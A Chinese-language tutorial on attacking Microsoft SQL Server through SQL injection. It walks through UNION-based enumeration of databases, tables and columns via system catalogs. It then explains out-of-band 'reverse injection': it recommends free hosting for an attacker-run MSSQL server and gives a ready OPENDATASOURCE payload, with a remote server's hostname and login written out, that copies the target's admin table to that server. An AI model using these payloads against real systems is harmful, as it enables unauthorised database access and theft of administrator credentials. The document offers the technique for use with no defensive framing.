前言:
MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路。
MSSQL的显错注入操作:
以联合查询为例:
猜字段
联合查询:union all
猜出输出点使用null填充
注释只有 --+、-- a 没有#
查询系统库:select name,null,...... from dbo.sysdatabases 可以不用查库名
查询系统表:select name,null,...... from dbo.sysobjects where xtype='U' //U表示用户创建表
查询表中的字段:select name,null,...... from dbo.syscolumns where id= 表名对应的id
MSSQL反弹注入:
MSSQL反弹注入的使用场景
命名是SQL的注入点却无法进行注入操作,注入工具猜解的速度异常缓慢,错误提示信息关闭,无法返回注入结果等,这些都是在注入攻击中常常遇到的问题。
为了解决以上这些疑难杂症,比较好的解决方法就是使用反弹注入技术,而反弹注入技术则需要依靠opendatasource函数支持。
环境的搭建:
我们前面说到,MSSQL注入 — 反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上,那么我们需要自己的MSSQL数据库和一个公网IP。
香港云(http://www.webweb.com/) 随便拿个邮箱然后注册就行
香港云如果失效:https://my.gearhost.com/CloudSite
数据库连接器:http://mssqlus.webweb.com/
反弹注入语句解析:
insert into opendatasource('sqloledb','server=SQL5009.webweb.com,1433;uid=DB_14A5E44_zkaq_admin;pwd=zkaqzkaq;database=DB_14A5E44_zkaq').DB_14A5E44_zkaq.dbo.temp select * from admin --
Insert into 很明显是插入语句 然后出现了个opendatasource。
opendatasource 为了方便理解,可以看理解为 ‘使用opendatasource函数将当前数据库查询的结果发送到另一数据库服务器中。
语法:
OPENDATASOURCE(provider_name,init_string)
provider_name
注册为用于访问数据源的OLE DB 提供程序的PROGID的名称 MSSQL的名称为SQLOLEDB
init_string
连接字符串
连接地址、端口、用户名、密码、数据库名
server=连接地址,端口;uid=用户名;pwd=密码;database=数据库名称
连接上服务器后选定数据表DB_14A5E44_zkaq.dbo.temp 把后面语句的查询结果插入到那个表里面